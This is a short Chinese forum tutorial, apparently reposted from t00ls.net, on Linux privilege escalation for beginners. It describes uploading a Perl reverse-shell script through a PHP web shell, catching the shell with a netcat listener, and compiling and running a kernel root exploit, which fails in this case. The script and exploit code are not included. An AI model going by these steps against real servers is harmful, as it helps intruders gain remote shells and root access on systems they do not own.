linux溢出提权(适合刚学习linux提权的朋友)

from:t00ls.net
作者wjs qq825680101



我也是刚接触linux，谢谢师傅sunwear的指导。

先在网站目录上传1.pl,是个反弹脚本

Phpshell执行chmod+x1.pl，给1.pl执行权限，图0




然后执行./1.pl本机IP1224



然后本机监听nc-vv-l-p1224，图1反弹成功






输入id

bash-3.2$id

uid=529(zeicom)gid=525(zeicom)groups=525(zeicom)

bash-3.2$

这里uid=529(zeicom)还不是root权限，输入uname–r

返回：2.6.18-164.11.1.el5PAE



找对应的exp,这里地址整理很齐全可以这里下

cc–o22.c  //把2.c编译成可执行文件

chmod+x2//给2有执行权限

./2//执行2,2是溢出的exp文件。图2






看图可以发现没提权成功，过程就是这样。以后遇到linux可以这样提权。不会linux提权的朋友可以学习下，会有所收获的。



反弹脚本

 





1.zip




*